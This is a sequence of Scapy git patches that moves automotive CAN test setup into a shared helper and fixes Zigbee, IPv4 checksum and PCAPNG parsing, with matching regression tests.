lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket0() as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -print("CAN sockets should work now") - -= Overwrite definition for vcan_socket systems native sockets -~ vcan_socket not_pypy needs_root linux - -if six.PY3 and LINUX: - from scapy.contrib.cansocket_native import * - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - - -= Overwrite definition for vcan_socket systems python-can sockets -~ vcan_socket needs_root linux -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface, timeout=0.01) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, timeout=0.01) - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - - -= Check if can-isotp and can-utils are installed on this system -~ linux -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - -+ Syntax check - -= Import isotp -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) - -load_contrib("isotp", globals_dict=globals()) - -if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - assert ISOTPSocket == ISOTPNativeSocket + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - assert ISOTPSocket == ISOTPSoftSocket - + execfile("test/contrib/automotive/interface_mockup.py") = Test send_multiple_ext() @@ -881,14 +768,11 @@ test_dynamic(test_isotpscan_none_random_ids) test_dynamic(test_isotpscan_none_random_ids_padding) -= Delete vcan interfaces -~ vcan_socket needs_root linux ++ Cleanup -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) += Delete vcan interfaces -if 0 != call(["sudo", "ip", "link", "delete", iface1]): - raise Exception("%s could not be deleted" % iface1) +assert cleanup_interfaces() + Coverage stability tests diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 30ebb7059f1..d9430df2ba7 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -1,107 +1,17 @@ % Regression tests for isotpscanner -~ vcan_socket needs_root linux +~ vcan_socket needs_root linux not_pypy + Configuration ~ conf = Imports -load_layer("can", globals_dict=globals()) - -import threading, subprocess, sys import scapy.modules.six as six -from subprocess import call - -= Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" - -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -= Initialize a virtual CAN interface -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - - -if six.PY3 and not conf.use_pypy: - from scapy.contrib.cansocket_native import * -else: - from scapy.contrib.cansocket_python_can import * - -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, timeout=0.01) - can_socket_string_list = ["-i", "socketcan", "-c", iface0, "-a", "bitrate=250000"] +if six.PY3: + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - can_socket_string_list = ["-c", iface0] - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -print("CAN sockets should work now") - - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - - -= Check if can-isotp and can-utils are installed on this system -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - -+ Syntax check - -= Import isotp -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} -load_contrib("isotp", globals_dict=globals()) + execfile("test/contrib/automotive/interface_mockup.py") ISOTPSocket = ISOTPSoftSocket @@ -340,10 +250,6 @@ for out in expected_output: + Cleanup -= Cleanup - -if 0 != call(["sudo", "ip", "link", "delete", "vcan0"]): - raise Exception("vcan0 could not be deleted") += Delete vcan interfaces -if 0 != call(["sudo", "ip", "link", "delete", "vcan1"]): - raise Exception("vcan1 could not be deleted") +assert cleanup_interfaces() diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 16b6e5f9b31..4a68e341c66 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -1,123 +1,16 @@ % Regression tests for obdscanner -~ vcan_socket needs_root linux +~ vcan_socket needs_root linux not_pypy + Configuration ~ conf = Imports -load_layer("can", globals_dict=globals()) import scapy.modules.six as six -import subprocess, sys -from subprocess import call -from scapy.contrib.automotive.ecu import * - -print("Set delay to lower utilization") -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 -= Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" - -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -def temporary_skip_unstable_test(): - err = "TEST SKIPPED: Unstable unit test. Stabilize me!\n" - sys.__stderr__.write(err) - warning("Unstable unit test. FIXME!") - exit(0) - - -= Initialize a virtual CAN interface -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - - -if six.PY3 and not conf.use_pypy: - from scapy.contrib.cansocket_native import * -else: - from scapy.contrib.cansocket_python_can import * - - -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, timeout=0.01) - can_socket_string_list = ["-i", "socketcan", "-c", iface0] -else: - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - can_socket_string_list = ["-c", iface0] - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - - -= Check if can-isotp and can-utils are installed on this system -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - -+ Syntax check - -= Import isotp -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) - -load_contrib("isotp", globals_dict=globals()) - -if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - assert ISOTPSocket == ISOTPNativeSocket + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - assert ISOTPSocket == ISOTPSoftSocket + execfile("test/contrib/automotive/interface_mockup.py") + Usage tests @@ -322,10 +215,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, + Cleanup -= Cleanup - -if 0 != call(["sudo", "ip", "link", "delete", "vcan0"]): - raise Exception("vcan0 could not be deleted") += Delete vcan interfaces -if 0 != call(["sudo", "ip", "link", "delete", "vcan1"]): - raise Exception("vcan1 could not be deleted") +assert cleanup_interfaces() diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts index 8bc703d80c4..d24ecbfbef6 100644 --- a/test/tools/xcpscanner.uts +++ b/test/tools/xcpscanner.uts @@ -7,72 +7,22 @@ ############ + Basic operations -= Imports - -import threading -from subprocess import call - -import six - -from scapy.consts import LINUX -from scapy.contrib.automotive.xcp.cto_commands_master import Connect, TransportLayerCmd, TransportLayerCmdGetSlaveId -from scapy.contrib.automotive.xcp.scanner import XCPOnCANScanner -from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnCAN, CTOResponse, ConnectPositiveResponse, TransportLayerCmdGetSlaveIdResponse, GenericResponse -from scapy.contrib.cansocket_python_can import CANSocket -from scapy.main import load_layer - -= Load module - -load_layer("can", globals_dict=globals()) -load_contrib("automotive.xcp.xcp", globals_dict=globals()) - -= Global variables - -iface0 = "vcan0" - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux - -print('setting up CAN') - -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") += Imports +import scapy.modules.six as six -= Define new_can_socket0 for root and linux -~ vcan_socket needs_root linux -if six.PY3 and not conf.use_pypy: - from scapy.contrib.cansocket_native import CANSocket - new_can_socket0 = lambda: CANSocket(iface0) - print("Using Native CANSocket on " + iface0) +if six.PY3: + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - from scapy.contrib.cansocket_python_can import CANSocket - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, bitrate=250000, timeout=0.01) - print("Using Soft CANSocket on " + iface0) + execfile("test/contrib/automotive/interface_mockup.py") -= Define new_can_socket0 without root or linux -if "new_can_socket0" not in globals(): - from scapy.contrib.cansocket_python_can import CANSocket - new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) - print("Using Soft CANSocket on virtual in-process can bus") ++ Tests XCPonCAN Scanner += import XCP modules -= verify CAN Socket creation works -s = new_can_socket0() -s.close() +load_contrib("automotive.xcp.xcp", globals_dict=globals()) +load_contrib("automotive.xcp.scanner", globals_dict=globals()) -+ Tests XCPonCAN Scanner = xcp can scanner broadcast ID-Range @@ -172,8 +122,7 @@ assert result[0].response_id == response_id + Cleanup + = Delete vcan interfaces -~ vcan_socket needs_root linux -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) +assert cleanup_interfaces() From 1aa128691a4d3e74962d0780aa8fdded4938077d Mon Sep 17 00:00:00 2001 From: Dimitrios-Georgios Akestoridis Date: Wed, 3 Feb 2021 10:16:11 -0500 Subject: [PATCH 0495/1632] Fix Zigbee regression (#3071) * Fix bug in the dissection of Network Reports * Rename the ZCL direction subfield * Add a deprecated_fields dictionary --- scapy/layers/zigbee.py | 25 ++++++++++++++----------- test/scapy/layers/dot15d4.uts | 26 +++++++++++++++++++++++++- 2 files changed, 39 insertions(+), 12 deletions(-) diff --git a/scapy/layers/zigbee.py b/scapy/layers/zigbee.py index 6b8090ef50f..4f44e0f0d76 100644 --- a/scapy/layers/zigbee.py +++ b/scapy/layers/zigbee.py @@ -439,13 +439,6 @@ class ZigbeeNWKCommandPayload(Packet): BitEnumField("report_command_identifier", 0, 3, {0: "PAN identifier conflict"}), # 0x01 - 0x07 Reserved # noqa: E501 lambda pkt: pkt.cmd_identifier == 9), ConditionalField(BitField("report_information_count", 0, 5), lambda pkt: pkt.cmd_identifier == 9), # noqa: E501 - # Report information (variable length) - # Only present if we have a PAN Identifier Conflict Report - ConditionalField( - FieldListField("PAN_ID_conflict_report", [], XLEShortField("", 0x0000), # noqa: E501 - count_from=lambda pkt:pkt.report_information_count), - lambda pkt:(pkt.cmd_identifier == 9 and pkt.report_command_identifier == 0) # noqa: E501 - ), # - Network Update Command - # # Command options (1 octet) @@ -458,6 +451,13 @@ class ZigbeeNWKCommandPayload(Packet): dot15d4AddressField("epid", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.cmd_identifier in [9, 10] ), + # Report information (variable length) + # Only present if we have a PAN Identifier Conflict Report + ConditionalField( + FieldListField("PAN_ID_conflict_report", [], XLEShortField("", 0x0000), # noqa: E501 + count_from=lambda pkt:pkt.report_information_count), + lambda pkt:(pkt.cmd_identifier == 9 and pkt.report_command_identifier == 0) # noqa: E501 + ), # Update Id (1 octet) ConditionalField(ByteField("update_id", 0), lambda pkt: pkt.cmd_identifier == 10), # noqa: E501 # Update Information (Variable) @@ -1078,11 +1078,14 @@ class ZCLPricePublishPrice(Packet): class ZigbeeClusterLibrary(Packet): name = "Zigbee Cluster Library (ZCL) Frame" + deprecated_fields = { + "direction": ("command_direction", "2.5.0"), + } fields_desc = [ # Frame control (8 bits) BitField("reserved", 0, 3), BitField("disable_default_response", 0, 1), # 0 default response command will be returned # noqa: E501 - BitField("direction", 0, 1), # 0 command sent from client to server; 1 command sent from server to client # noqa: E501 + BitField("command_direction", 0, 1), # 0 command sent from client to server; 1 command sent from server to client # noqa: E501 BitField("manufacturer_specific", 0, 1), # 0 manufacturer code shall not be included in the ZCL frame # noqa: E501 # Frame Type # 0b00 command acts across the entire profile @@ -1105,11 +1108,11 @@ def guess_payload_class(self, payload): # done in bind_layers pass # Cluster-specific commands - elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.direction == 0 and self.underlayer.cluster == 0x0700: # "price" # noqa: E501 + elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.command_direction == 0 and self.underlayer.cluster == 0x0700: # "price" # noqa: E501 return ZCLPriceGetCurrentPrice - elif self.zcl_frametype == 0x01 and self.command_identifier == 0x01 and self.direction == 0 and self.underlayer.cluster == 0x0700: # "price" # noqa: E501 + elif self.zcl_frametype == 0x01 and self.command_identifier == 0x01 and self.command_direction == 0 and self.underlayer.cluster == 0x0700: # "price" # noqa: E501 return ZCLPriceGetScheduledPrices - elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.direction == 1 and self.underlayer.cluster == 0x0700: # "price" # noqa: E501 + elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.command_direction == 1 and self.underlayer.cluster == 0x0700: # "price" # noqa: E501 return ZCLPricePublishPrice return Packet.guess_payload_class(self, payload) diff --git a/test/scapy/layers/dot15d4.uts b/test/scapy/layers/dot15d4.uts index 16f5a4eaa76..9d42f7e624f 100644 --- a/test/scapy/layers/dot15d4.uts +++ b/test/scapy/layers/dot15d4.uts @@ -675,6 +675,17 @@ assert pkt[ZigbeeNWKCommandPayload].link_status_list[2].outgoing_cost == 1 assert raw(pkt[ZigbeeNWKCommandPayload].link_status_list[2].payload) == b'' assert raw(pkt[ZigbeeNWKCommandPayload].payload) == b'' += Zigbee - Network Report + +pkt = ZigbeeNWKCommandPayload(b'\t\x01\x88wfUD3"\x11\xaa\x99') +assert ZigbeeNWKCommandPayload in pkt.layers() +assert pkt[ZigbeeNWKCommandPayload].cmd_identifier == 0x09 +assert pkt[ZigbeeNWKCommandPayload].report_information_count == 0b00001 +assert pkt[ZigbeeNWKCommandPayload].report_command_identifier == 0b000 +assert pkt[ZigbeeNWKCommandPayload].epid == 0x1122334455667788 +assert pkt[ZigbeeNWKCommandPayload].PAN_ID_conflict_report == [0x99aa] +assert raw(pkt[ZigbeeNWKCommandPayload].payload) == b'' + = Zigbee - End Device Timeout Request pkt = ZigbeeNWKCommandPayload(b'\x0b\x03\x00') @@ -747,6 +758,7 @@ assert pkt[ZigbeeAppCommandPayload].address == 0x1122334455667788 assert raw(pkt[ZigbeeAppCommandPayload].payload) == b'' = Zigbee - APS acknowledgment (with the Acknowledgment Format enabled) + pkt = ZigbeeAppDataPayload(b'\x12\xa8') assert ZigbeeAppDataPayload in pkt.layers() assert pkt[ZigbeeAppDataPayload].aps_frametype == 2 @@ -756,6 +768,7 @@ assert pkt[ZigbeeAppDataPayload].counter == 168 assert raw(pkt[ZigbeeAppDataPayload].payload) == b'' = Zigbee - APS acknowledgment (with the Acknowledgment Format disabled) + pkt = ZigbeeAppDataPayload(b'\x02\x00\x02\x00\x00\x00\x00\xa6') assert ZigbeeAppDataPayload in pkt.layers() pkt.show() @@ -770,6 +783,7 @@ assert pkt[ZigbeeAppDataPayload].counter == 166 assert raw(pkt[ZigbeeAppDataPayload].payload) == b'' = Zigbee - ZDP command + pkt = ZigbeeAppDataPayload(b'\x08\x006\x00\x00\x00\x00\xb5\x01\x14\x01') assert ZigbeeAppDataPayload in pkt.layers() assert pkt[ZigbeeAppDataPayload].aps_frametype == 0 @@ -784,6 +798,7 @@ assert ZigbeeDeviceProfile in pkt.layers() assert raw(pkt[ZigbeeDeviceProfile]) == b'\x01\x14\x01' = Zigbee - ZCL command + pkt = ZigbeeAppDataPayload(b'@\x01\n\x00\x04\x01\x01\x9d\x00\x00\x00\x00\x00') assert ZigbeeAppDataPayload in pkt.layers() assert pkt[ZigbeeAppDataPayload].aps_frametype == 0 @@ -795,4 +810,13 @@ assert pkt[ZigbeeAppDataPayload].profile == 0x0104 assert pkt[ZigbeeAppDataPayload].src_endpoint == 1 assert pkt[ZigbeeAppDataPayload].counter == 157 assert ZigbeeClusterLibrary in pkt.layers() -assert raw(pkt[ZigbeeClusterLibrary]) == b'\x00\x00\x00\x00\x00' +assert pkt[ZigbeeClusterLibrary].zcl_frametype == 0b00 +assert pkt[ZigbeeClusterLibrary].manufacturer_specific == 0b0 +assert pkt[ZigbeeClusterLibrary].command_direction == 0b0 +assert pkt[ZigbeeClusterLibrary].disable_default_response == 0b0 +assert pkt[ZigbeeClusterLibrary].transaction_sequence == 0 +assert pkt[ZigbeeClusterLibrary].command_identifier == 0x00 +assert ZCLGeneralReadAttributes in pkt.layers() +assert len(pkt[ZCLGeneralReadAttributes].attribute_identifiers) == 1 +assert pkt[ZCLGeneralReadAttributes].attribute_identifiers[0] == 0x0000 +assert raw(pkt[ZCLGeneralReadAttributes].payload) == b'' From b014efdf9edb6f81fedb78d08b7b8f2b49752cc6 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 6 Feb 2021 14:24:13 +0100 Subject: [PATCH 0496/1632] =?UTF-8?q?Compute=20the=20IPv4=20checksum=20usi?= =?UTF-8?q?ng=20=20the=20IP=20address=20from=20a=20Source=20Routing?= =?UTF-8?q?=E2=80=A6=20(#3076)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Compute the IPv4 checksum using the IP address from a Source Routing Option if any * Change the raw representation * Filter IPOption_LSRR & IPOption_SSRR instances * Use DNS on top of UDP --- scapy/layers/inet.py | 14 ++++++++++++++ test/scapy/layers/inet.uts | 9 ++++++++- 2 files changed, 22 insertions(+), 1 deletion(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 80aa961a024..23fa2288e50 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -653,6 +653,20 @@ def in4_chksum(proto, u, p): ln = max(u.len - 4 * ihl, 0) else: ln = len(p) + + # Filter out IPOption_LSRR and IPOption_SSRR + sr_options = [opt for opt in u.options if isinstance(opt, IPOption_LSRR) or + isinstance(opt, IPOption_SSRR)] + len_sr_options = len(sr_options) + if len_sr_options == 1 and len(sr_options[0].routers): + # The checksum must be computed using the final + # destination address + u.dst = sr_options[0].routers[-1] + elif len_sr_options > 1: + message = "Found %d Source Routing Options! " + message += "Falling back to IP.dst for checksum computation." + warning(message, len_sr_options) + psdhdr = struct.pack("!4s4sHH", inet_pton(socket.AF_INET, u.src), inet_pton(socket.AF_INET, u.dst), diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 43af652280f..2b834564583 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -56,7 +56,7 @@ p = IP(src="9.10.11.12", dst="13.14.15.16", options=[IPOption_NOP(),IPOption_LSR p r = raw(p) r -assert(r == b'K\x00\x00@\x00\x01\x00\x00@\x06\xf3\x83\t\n\x0b\x0c\r\x0e\x0f\x10\x01\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08\x82\x0b\x00\x00\x00\x00\x00\x00XYZ\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00_K\x00\x00') +assert(r == b'K\x00\x00@\x00\x01\x00\x00@\x06\xf3\x83\t\n\x0b\x0c\r\x0e\x0f\x10\x01\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08\x82\x0b\x00\x00\x00\x00\x00\x00XYZ\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00o[\x00\x00') q = IP(r) q assert(q[IPOption_LSRR].get_current_router() == "1.2.3.4") @@ -584,4 +584,11 @@ def test_IPID_count(): test_IPID_count() += IPv4 - Checksum computation with source routing +no_sr = IP(raw(IP(dst="8.8.8.8")/UDP()/DNS())) +sr = IP(raw(IP(options=[IPOption_SSRR(routers=["1.1.1.1", "8.8.8.8"])])/UDP()/DNS())) +assert no_sr[UDP].chksum == sr[UDP].chksum + +sr = IP(raw(IP(options=[IPOption_LSRR(routers=["1.1.1.1"]), IPOption_SSRR(routers=["8.8.8.8"])])/UDP()/DNS())) +assert no_sr[UDP].chksum != sr[UDP].chksum From ca633b1db86348ea1f23034f1d26f059e956c556 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sat, 6 Feb 2021 18:22:00 +0100 Subject: [PATCH 0497/1632] Swap Travis badge for Github Actions --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 6f725b122fe..475ea440a0c 100644 --- a/README.md +++ b/README.md @@ -6,7 +6,7 @@ # Scapy -[![Travis Build Status](https://travis-ci.com/secdev/scapy.svg?branch=master)](https://travis-ci.com/secdev/scapy) +[![Scapy unit tests](https://github.com/secdev/scapy/workflows/Scapy%20unit%20tests/badge.svg?event=push)](https://github.com/secdev/scapy/actions?query=workflow%3A%22Scapy+unit+tests%22+branch%3Amaster+event%3Apush) [![AppVeyor Build status](https://ci.appveyor.com/api/projects/status/os03daotfja0wtp7/branch/master?svg=true)](https://ci.appveyor.com/project/secdev/scapy/branch/master) [![Codecov Status](https://codecov.io/gh/secdev/scapy/branch/master/graph/badge.svg)](https://codecov.io/gh/secdev/scapy) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/30ee6772bb264a689a2604f5cdb0437b)](https://www.codacy.com/app/secdev/scapy) From f3c4c512b4de3cc5912fc4bdde7ac41dbeac9ff5 Mon Sep 17 00:00:00 2001 From: Michael Brandeis Date: Sat, 6 Feb 2021 09:29:20 -0800 Subject: [PATCH 0498/1632] PCAPNG dissection improvements (#2895) - Fix blocklen computation - Improve SHB read - Improve error managment Co-authored-by: Michael Brandeis Co-authored-by: gpotter2 --- .gitignore | 1 + scapy/tools/UTscapy.py | 18 ++-- scapy/utils.py | 170 +++++++++++++++++++------------ test/pcaps/macos.pcapng.gz | Bin 0 -> 526 bytes test/regression.uts | 20 +++- test/scapy/layers/dot15d4.uts | 8 +- test/scapy/layers/http.uts | 28 ++--- test/scapy/layers/netflow.uts | 12 +-- test/sslv2.uts | 4 +- test/tls.uts | 12 +-- test/tls/tests_tls_netaccess.uts | 22 ++-- 11 files changed, 158 insertions(+), 137 deletions(-) create mode 100644 test/pcaps/macos.pcapng.gz diff --git a/.gitignore b/.gitignore index e90fba94c72..b8685028c74 100644 --- a/.gitignore +++ b/.gitignore @@ -7,6 +7,7 @@ MANIFEST scapy/VERSION test/*.html .tox +.ipynb_checkpoints .mypy_cache doc/scapy/_build doc/scapy/api diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 225de07ef97..9365e77e958 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -84,6 +84,15 @@ def retry_test(func): assert success return result + +def scapy_path(fname): + """Resolves a path relative to scapy's root folder""" + if fname.startswith('/'): + fname = fname[1:] + return os.path.abspath(os.path.join( + os.path.dirname(__file__), '../../', fname + )) + # Import tool # @@ -546,8 +555,9 @@ def run_test(test, get_interactive_session, theme, verb=3, def import_UTscapy_tools(ses): """Adds UTScapy tools directly to a session""" - ses["retry_test"] = retry_test ses["Bunch"] = Bunch + ses["retry_test"] = retry_test + ses["scapy_path"] = scapy_path if WINDOWS: from scapy.arch.windows import _route_add_loopback _route_add_loopback() @@ -1091,9 +1101,6 @@ def main(): except ImportError as e: raise getopt.GetoptError("cannot import [%s]: %s" % (m, e)) - # Add SCAPY_ROOT_DIR environment variable, used for tests - os.environ['SCAPY_ROOT_DIR'] = os.environ.get("PWD", os.getcwd()) - autorun_func = { Format.TEXT: scapy.autorun_get_text_interactive_session, Format.ANSI: scapy.autorun_get_ansi_interactive_session, @@ -1175,9 +1182,6 @@ def main(): f.write(glob_output.encode("utf8", "ignore") if 'b' in f.mode or six.PY2 else glob_output) - # Delete scapy's test environment vars - del os.environ['SCAPY_ROOT_DIR'] - # Print end message if VERB > 2: if glob_result == 0: diff --git a/scapy/utils.py b/scapy/utils.py index a1a3fc51e99..b5f6e1eb827 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1125,20 +1125,20 @@ def __call__(cls, filename): # type: ignore ) try: i.__init__(filename, fdesc, magic) - except Scapy_Exception: - if "alternative" in cls.__dict__: - cls = cls.__dict__["alternative"] - i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) - try: - i.__init__(filename, fdesc, magic) - except Scapy_Exception: - try: - i.f.seek(-4, 1) - except Exception: - pass - raise Scapy_Exception("Not a supported capture file") - - return i + return i + except (Scapy_Exception, EOFError): + pass + + if "alternative" in cls.__dict__: + cls = cls.__dict__["alternative"] + i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + try: + i.__init__(filename, fdesc, magic) + return i + except (Scapy_Exception, EOFError): + pass + + raise Scapy_Exception("Not a supported capture file") @staticmethod def open(fname # type: Union[IO[bytes], str] @@ -1365,33 +1365,81 @@ def __init__(self, filename, fdesc, magic): "tsresol": 1000000 } self.blocktypes = { - 1: self.read_block_idb, - 2: self.read_block_pkt, - 3: self.read_block_spb, - 6: self.read_block_epb, + 1: self._read_block_idb, + 2: self._read_block_pkt, + 